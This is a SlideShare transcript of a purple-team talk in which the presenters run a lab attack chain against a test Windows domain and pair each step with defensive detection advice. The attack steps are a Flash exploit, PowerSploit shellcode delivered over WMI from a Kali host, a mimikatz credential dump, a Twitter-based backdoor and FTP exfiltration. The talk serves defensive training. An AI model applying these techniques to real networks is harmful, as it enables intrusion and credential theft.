SlideShare una empresa de Scribd logo

Purple View

H
Haydn Johnson

The recent trend of using Attack and Defense Together. Due to the recent trend of using offensive and defensive capabilities together, we thought a talk on Purple Teaming would be interesting. We hope to benefit those on the Attack side (red team), Defensive (blue team) and mixing the two.

Tecnología
1 de 100
Descargar para leer sin conexión
Purple View The recent trend of using Attack and Defense Together Not OUR idea - backed by many @raffertylaura | @haydnjohnson
Quick who are we Haydn Johnson @haydnjohnson OSCP Offensive/Attack Interest Enjoys presenting Laura @raffertylaura MSc Computer Science (Security/Privacy) Interested in both sides of security Loooooves presenting @raffertylaura | @haydnjohnson
Contents 1. Basic Term Definition 2. Introduction to Red, Blue and Purple 3. Run through of an Attack ○ Gaining Access ○ Lateral Movement ○ Domain Admin ○ Maintaining Access ○ Data Exfiltration 4. For each attack: ○ Attacking View ○ Defenders View ○ Possible Purple Team exercises @raffertylaura | @haydnjohnson
Definitions Exploit - The thing used to gain unauthorized access to a system Payload - What is done after the access is gained (shell, command) Metasploit - An open source exploit framework, modular Meterpreter - an advanced, extensible payload that uses in-memory DLL injection Shell - Gaining Terminal/CMD access remotely https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/ http://www.metasploit.com/
Red Team - Penetration | Offensive ● Scans ● Exploits ● Logic abuse ● Access to things they shouldn’t @raffertylaura | @haydnjohnson
Blue Team - Block, Prevent, Detect | Defensive ● Logs ● Emails ● Events ● Triggers ● Networking ● More Logs @raffertylaura | @haydnjohnson
Red Team - Goals ● Model recent threats and trends ● Longer term ● Highlight Gaps in Security Controls, detection etc ● Escape and Evade for Persistence @raffertylaura | @haydnjohnson
Blue Team - Goals ● Detect Attack ● Respond and Recover ● Produce Actionable Intelligence ● Identify Gaps and investment needs @raffertylaura | @haydnjohnson
Purple Team - Offensive & Defensive Working together to achieve the ultimate goal of making the organization more secure ● Exposes blue team to different threats & attacker mindset ● Test incident detection and response ● Allows red team to sharpen skills ● Policy and procedures tested ● Tuning of controls @raffertylaura | @haydnjohnson
Purple Team - Offensive & Defensive Different types of Purple Teaming ● Read Team Sitting with Network Defense team ● Adversary Simulation ● Traffic Generation ● cobaltstrike.com ● Wargaming Requires total picture involving all areas of the organization @raffertylaura | @haydnjohnson
Purple Team - The difference ● Using Security Posture and Weaknesses to find what is most valuable ● Goal Oriented ● Review attack ● Test how teams use services and how they are managed @raffertylaura | @haydnjohnson
Purple Team - The difference ● Time to Domain Admin ● Time to Data/Objective ● Time to Respond ● Time to Recover ● Identify where there needs to be more investment ● Measure Impact Done right, the blue team should come out with better monitoring and response plans. @raffertylaura | @haydnjohnson
Purple Team - The difference ● Set up a fake scenario - Assume Breach ● How will the attacker gain access? ● Why have they attacked, what do they want? ● How did they move through the network? ● If they exfiltrated data, how? Do not turn off servers, block IP addresses, make it realistic @raffertylaura | @haydnjohnson
Purple Team - Exercise “In the beginning, it’s easy to challenge and exercise a network defense team. You will find that many network defenders do not have a lot of experience (actively) dealing with a sophisticated adversary.” - Raphael Mudge http://blog.cobaltstrike.com/2014/11/12/adversary-simulation-becomes-a-thing/ @raffertylaura | @haydnjohnson
Purple Team - DEMO (step by step) Our exercise @raffertylaura | @haydnjohnson
Purple Team - Demo Architecture @raffertylaura | @haydnjohnson Domain: corp.test.com
Tools Used Red Team: ● Kali Linux ● Metasploit ● Meterpreter ● PowerSploit ● Twittor Blue Team: ● Wireshark ● Windows Event Logs @raffertylaura | @haydnjohnson
Setting up Windows GP @raffertylaura | @haydnjohnson
Gaining Access Hacking Team Flash Exploit @raffertylaura | @haydnjohnson
Flash Exploits @raffertylaura | @haydnjohnson ● Flash plugins are vulnerable ○ You can embed a javascript/binary within a Flash file ○ ActionScript to define events to redirect to landing page ● Most exploit kit landing pages redirect to pages containing Flash exploits ○ Angler ○ Nuclear ○ Fiesta ● Installed by default on browser ● New vulnerabilities are identified on almost a weekly basis
Gaining Access @raffertylaura | @haydnjohnson Flash 18.0.0.194
A: Flash Exploit from SecurityFocus Hacking Team Flash Exploit: http://downloads.securityfocus.com/vulnerabilities/exploits/75568.rb
A: Start Flash Exploit from Kali @raffertylaura | @haydnjohnson
A: Start Flash Exploit from Kali @raffertylaura | @haydnjohnson
Client1 User navigates to malicious site which redirects to the exploit A: Redirect Victim @raffertylaura | @haydnjohnson
A: Client1 is exploited @raffertylaura | @haydnjohnson
A: A session is now established with Client1 We can now run Meterpreter @raffertylaura | @haydnjohnson
B: Wireshark: Landing Page and Redirect @raffertylaura | @haydnjohnson
B: Wireshark: Shell @raffertylaura | @haydnjohnson
B: What can you take away Security Onion, implement it, free Has snort rules for Flash exploits (need to install) Confirm if flash is needed for business reasons Keep flash updated 2811962 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 SSL Cert (trojan.rules) 2811963 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 CnC Beacon (trojan.rules) @raffertylaura | @haydnjohnson https://www.security-database.com/detail.php?alert=CVE-2015-5119 https://security-onion-solutions.github.io/security-onion/
Purple Team - Exercise ● Blue team understands how attackers can gain initial access ● Flash exploits - ongoing issue ● Helps blue team to identify suspicious traffic and what is happening from the attacker perspective ● Red team sees how attacks are visible by blue team and think of ways to make it more stealthy @raffertylaura | @haydnjohnson
Privilege Escalation Not Shown @raffertylaura | @haydnjohnson
Privilege Escalation ● We are skipping privilege escalation from Domain User to Local Admin @raffertylaura | @haydnjohnson
Lateral Movement PowerSploit @raffertylaura | @haydnjohnson
A: PowerSploit Available on Github Open Source https://github.com/mattifestation/PowerSploit @raffertylaura | @haydnjohnson
A: PowerSploit More than 1 script! PowerShell Modules @raffertylaura | @haydnjohnson
PowerView Part of PowerShell Empire Very advanced https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView @raffertylaura | @haydnjohnson
A: Lateral Movement The same local Administrator account passwords on multiple computers. by Sean Metcalf https://adsecurity.org/?p=1684 @raffertylaura | @haydnjohnson
Same Passwords for All Local Admins
A: Lateral Movement @raffertylaura | @haydnjohnson
A: Lateral Movement Powersploit Remote Powershell Using Invoke--Shellcode.ps1 @raffertylaura | @haydnjohnson
A: Base64 Encoding Payload Remove issues with whitespace The Hacker Playbook 1 (now 2) @raffertylaura | @haydnjohnson http://thehackerplaybook.com/dashboard/
A: Hosting Powersploit Invoke--Shellcode.ps1 PowerSploit code hosted on local Kali machine @raffertylaura | @haydnjohnson
A: Invoke-WmiMethod Use powershell to connect remotely, create a new process and launch the IEX cradle. Calls Windows Management Instrumentation (WMI) methods. The Win32_Process WMI class allows creation of a process. @raffertylaura | @haydnjohnson
A: Execute Remote command Execute command from Client1 to tell Client2 to download and execute shellcode @raffertylaura | @haydnjohnson
A: Client1 gives same password Same password across multiple clients @raffertylaura | @haydnjohnson
A: Receive Shell @raffertylaura | @haydnjohnson
B: WireShark traffic TCP Hand Shake Bind Requests @raffertylaura | @haydnjohnson
B: Client1 requests remote instance on Client2 @raffertylaura | @haydnjohnson
B: Client2 eventually asks where is Kali @raffertylaura | @haydnjohnson
B: Client2 downloads Invoke--Shellcode.ps1 @raffertylaura | @haydnjohnson
B: Client1 logs into Client2 @raffertylaura | @haydnjohnson
B: PowerShell Process Created @raffertylaura | @haydnjohnson
B: PowerShell connects to Kali Client2 reaches out to Kali on port 80 @raffertylaura | @haydnjohnson
B: What can you take away Event Correlation - based on event ID, source and destination for remote connections Implement alerting based on Security Events together SIEM can/SHOULD do this Use Log MD - really great logging tool, especially for powershell @raffertylaura | @haydnjohnson http://brakeingsecurity.com/2015-042-log_md-more-malware-archaeology-and-sifting- through-the-junk http://malwarearchaeology.squarespace.com/log-md/
Purple Team - Benefits ● Identify ways to move around the network ● Identify and confirm Defensive Controls in Place ● Identify what worked, what did not ● Implement changes ● Justification for resources @raffertylaura | @haydnjohnson
Privilege Escalation Local Admin to Domain Admin @raffertylaura | @haydnjohnson
A: Local Admin to Domain Admin @raffertylaura | @haydnjohnson ● Why escalate privileges from Local Admin to Domain Admin? ● Domain admin - control over active directory! ● Access IT resources ● Create accounts ● Propagate malware
A: Local Admin to Domain Admin @raffertylaura | @haydnjohnson
A: Local Admin to Domain Admin From Client1, map the admin$ share on Client2 and copy over sekurlsa.dll @raffertylaura | @haydnjohnson
A: Local Admin to Domain Admin Use psexec to run mimikatz.exe on Client2 @raffertylaura | @haydnjohnson
A: Local Admin to Domain Admin Use sekurlsa::logonpasswords to dump the Domain Admin logon credentials from Client2! @raffertylaura | @haydnjohnson
B: Wireshark: @raffertylaura | @haydnjohnson
B: Event Logs Client1 logs into Client2 local admin
B: Event Logs Client1 runs mimikatz on Client2 @raffertylaura | @haydnjohnson
B: Event Logs Sensitive privilege use from Client1 to Client2
B: What can you take away ● Prevention: ○ Access control for shared drive ○ Limit access to psexec and monitor use ○ Active Directory best practices ● Detection: ○ IDS signatures ○ SIEM use case - Event correlation between system logs and network proxy logs ○ For lateral movement: enable file level auditing ○ Canary accounts
Purple Team - Benefits ● Blue team observes vulnerabilities/threats which may not have been considered ○ Learns how attacker could escalate privileges from local admin to domain admin ● Red team observes the footprint left behind from this attack and possibly how to minimize it ○ Can identify potential weaknesses in blue team monitoring/response processes ○ Provide more thorough recommendations @raffertylaura | @haydnjohnson
Twittor Backdoor using Twitter @raffertylaura | @haydnjohnson
A: Twittor ● Easy to install ● Easy to Use ● Easy to add Shellcode https://github.com/PaulSec/twittor @raffertylaura | @haydnjohnson
A: Twittor - insides Simple Subprocess execution Stored as base64 encoded message
A: Pyinstaller On Github Turn Python file into EXE @raffertylaura | @haydnjohnsonhttps://github.com/pyinstaller/pyinstaller
A: Pyinstaller Python File becomes Executable @raffertylaura | @haydnjohnson
@raffertylaura | @haydnjohnson Twittor: Backdoor Using Twitter
A: Twittor Python file used as C2 Server Python file used as backdoor EXE - Pyinstaller @raffertylaura | @haydnjohnson
A: Twittor - Retrieving command Send Command to execute Retrieve command @raffertylaura | @haydnjohnson
B: Twittor - Network Traffic Reaching out to API Normal User Traffic?? @raffertylaura | @haydnjohnson
B: Twittor - Client system Backdoor as Python Executable compiled with --no-console flag to hide output @raffertylaura | @haydnjohnson
B: Traffic from Client Reaches out to twitter Src and Destination are internal IPs, sends to API @raffertylaura | @haydnjohnson
B: What can you take away Check if there are any remote connections after hours, is it against policy? Again, Correlate logs with known C2 addresses See if AV picks it up @raffertylaura | @haydnjohnson
Purple Team - Benefits Test if a C2 can reach out to twitter. Social Media may be blocked via the browser, but some sites can still be accessed via API etc. If it is not blocked, why not, can your blue team help to stop this and others. @raffertylaura | @haydnjohnson
Data Exfiltration Clear Text FTP @raffertylaura | @haydnjohnson
@raffertylaura | @haydnjohnson A: Data Exfiltration Through Clear Text FTP
A: FTP Extraction Finding Data to extract @raffertylaura | @haydnjohnson
A: Finding data Important data identified @raffertylaura | @haydnjohnson
A: Downloading data @raffertylaura | @haydnjohnson
A: Data Transferred @raffertylaura | @haydnjohnson
B: Meterpreter connection DLL injection Lots of chatter @raffertylaura | @haydnjohnson
B: FTP connection Clear Text @raffertylaura | @haydnjohnson
B: Successful Transfer @raffertylaura | @haydnjohnson
B: What can you take away? @raffertylaura | @haydnjohnson Disable FTP - should not have a business need for it really If there is a business need whitelist those IP addresses | Create a group of users specifically for FTP
Purple Team - Exercise Clear Text Will any alarms trigger? Understand potential holes in alerting Measure time to detect and respond @raffertylaura | @haydnjohnson
Conclusion Purple Teaming is Good @raffertylaura | @haydnjohnson
Purple Team - Reiteration Provides more value than a Penetration Test Should be implemented into a regular schedule Helps train security personnel Helps make sure your boxes are tuned @raffertylaura | @haydnjohnson
Limitations and Future Work ● So far we have limited detection tools to Windows Server event logs and Wireshark, (and a bit of Snort) ● Could be extended for enterprise security tools such as SIEM/IDS ● Powershell/WMI for blue team ● More advanced attacks, persistence using Powershell Empire @raffertylaura | @haydnjohnson
Obligatory Cute Kat Picture
References are in following slides @raffertylaura | @haydnjohnson
Microsoft - 8 minute Video https://azure.microsoft.com/en-us/documentation/videos/red-vs-blue-internal-security-penetration-testing-of-microsoft-azure/ @raffertylaura | @haydnjohnson
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013 http://www.slideshare.net/beltface/hybrid-talk @raffertylaura | @haydnjohnson
A: Downloads PowerShell file Client2 reaches out to Kali machine @raffertylaura | @haydnjohnson

Recomendados

Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows toolIntroducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows toolMichael Gough
 
Windows Incident Response is hard, but doesn't have to be
Windows Incident Response is hard, but doesn't have to beWindows Incident Response is hard, but doesn't have to be
Windows Incident Response is hard, but doesn't have to beMichael Gough
 
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1Michael Gough
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0Michael Gough
 
You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0Michael Gough
 
The top 10 windows logs event id's used v1.0
The top 10 windows logs event id's used v1.0The top 10 windows logs event id's used v1.0
The top 10 windows logs event id's used v1.0Michael Gough
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?Michael Gough
 

Recomendados

Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows toolIntroducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows toolMichael Gough
 
Windows Incident Response is hard, but doesn't have to be
Windows Incident Response is hard, but doesn't have to beWindows Incident Response is hard, but doesn't have to be
Windows Incident Response is hard, but doesn't have to beMichael Gough
 
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1Michael Gough
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0Michael Gough
 
You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0Michael Gough
 
The top 10 windows logs event id's used v1.0
The top 10 windows logs event id's used v1.0The top 10 windows logs event id's used v1.0
The top 10 windows logs event id's used v1.0Michael Gough
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?Michael Gough
 
Logging for Hackers v1.0
Logging for Hackers v1.0Logging for Hackers v1.0
Logging for Hackers v1.0Michael Gough
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Chris Gates
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCanSecWest
 
InnoTech 2017_Defend_Against_Ransomware 3.0
InnoTech 2017_Defend_Against_Ransomware 3.0InnoTech 2017_Defend_Against_Ransomware 3.0
InnoTech 2017_Defend_Against_Ransomware 3.0Michael Gough
 
Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Michael Gough
 
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsEmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsFaithWestdorp
 
Windows IR made easier and faster v1.0
Windows IR made easier and faster v1.0Windows IR made easier and faster v1.0
Windows IR made easier and faster v1.0Michael Gough
 
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani GolandCODE BLUE
 
BSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointBSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointAndrew McNicol
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPRISMA CSI
 
Practical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPractical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPRISMA CSI
 
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01Michael Gough
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
You can detect PowerShell attacks
You can detect PowerShell attacksYou can detect PowerShell attacks
You can detect PowerShell attacksMichael Gough
 
Billions & Billions of Logs
Billions & Billions of LogsBillions & Billions of Logs
Billions & Billions of LogsJack Crook
 
Filar seymour oreilly_bot_story_
Filar seymour oreilly_bot_story_Filar seymour oreilly_bot_story_
Filar seymour oreilly_bot_story_EndgameInc
 
(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur lsINSIGHT FORENSIC
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class Chris Gates
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a JediYaroslav Babin
 
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLockerDEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLockerJorge Orchilles
 
8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 Matrix8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 MatrixJorge Orchilles
 

Más contenido relacionado

La actualidad más candente

Logging for Hackers v1.0
Logging for Hackers v1.0Logging for Hackers v1.0
Logging for Hackers v1.0Michael Gough
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Chris Gates
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCanSecWest
 
InnoTech 2017_Defend_Against_Ransomware 3.0
InnoTech 2017_Defend_Against_Ransomware 3.0InnoTech 2017_Defend_Against_Ransomware 3.0
InnoTech 2017_Defend_Against_Ransomware 3.0Michael Gough
 
Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Michael Gough
 
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsEmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsFaithWestdorp
 
Windows IR made easier and faster v1.0
Windows IR made easier and faster v1.0Windows IR made easier and faster v1.0
Windows IR made easier and faster v1.0Michael Gough
 
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani GolandCODE BLUE
 
BSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointBSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointAndrew McNicol
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPRISMA CSI
 
Practical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPractical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPRISMA CSI
 
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01Michael Gough
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
You can detect PowerShell attacks
You can detect PowerShell attacksYou can detect PowerShell attacks
You can detect PowerShell attacksMichael Gough
 
Billions & Billions of Logs
Billions & Billions of LogsBillions & Billions of Logs
Billions & Billions of LogsJack Crook
 
Filar seymour oreilly_bot_story_
Filar seymour oreilly_bot_story_Filar seymour oreilly_bot_story_
Filar seymour oreilly_bot_story_EndgameInc
 
(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur lsINSIGHT FORENSIC
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class Chris Gates
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a JediYaroslav Babin
 

La actualidad más candente (20)

Logging for Hackers v1.0
Logging for Hackers v1.0Logging for Hackers v1.0
Logging for Hackers v1.0
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
 
InnoTech 2017_Defend_Against_Ransomware 3.0
InnoTech 2017_Defend_Against_Ransomware 3.0InnoTech 2017_Defend_Against_Ransomware 3.0
InnoTech 2017_Defend_Against_Ransomware 3.0
 
Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1
 
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsEmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
 
Windows IR made easier and faster v1.0
Windows IR made easier and faster v1.0Windows IR made easier and faster v1.0
Windows IR made easier and faster v1.0
 
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
 
BSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointBSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPoint
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
 
Practical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPractical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber Security
 
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
You can detect PowerShell attacks
You can detect PowerShell attacksYou can detect PowerShell attacks
You can detect PowerShell attacks
 
Billions & Billions of Logs
Billions & Billions of LogsBillions & Billions of Logs
Billions & Billions of Logs
 
Filar seymour oreilly_bot_story_
Filar seymour oreilly_bot_story_Filar seymour oreilly_bot_story_
Filar seymour oreilly_bot_story_
 
(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a Jedi
 

Similar a Purple View

DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLockerDEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLockerJorge Orchilles
 
8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 Matrix8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 MatrixJorge Orchilles
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEJorge Orchilles
 
Adversary Emulation - DerpCon
Adversary Emulation - DerpConAdversary Emulation - DerpCon
Adversary Emulation - DerpConJorge Orchilles
 
Adversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixAdversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixJorge Orchilles
 
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue TeamersGo Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamersjasonjfrank
 
Purple teaming Cyber Kill Chain
Purple teaming Cyber Kill ChainPurple teaming Cyber Kill Chain
Purple teaming Cyber Kill ChainHaydn Johnson
 
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...Mauricio Velazco
 
PurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaPurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaMauricio Velazco
 
BSides Columbus: Active Defense - Helping threat actors hack themselves!
BSides Columbus: Active Defense - Helping threat actors hack themselves!BSides Columbus: Active Defense - Helping threat actors hack themselves!
BSides Columbus: Active Defense - Helping threat actors hack themselves!CiNPA Security SIG
 
Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
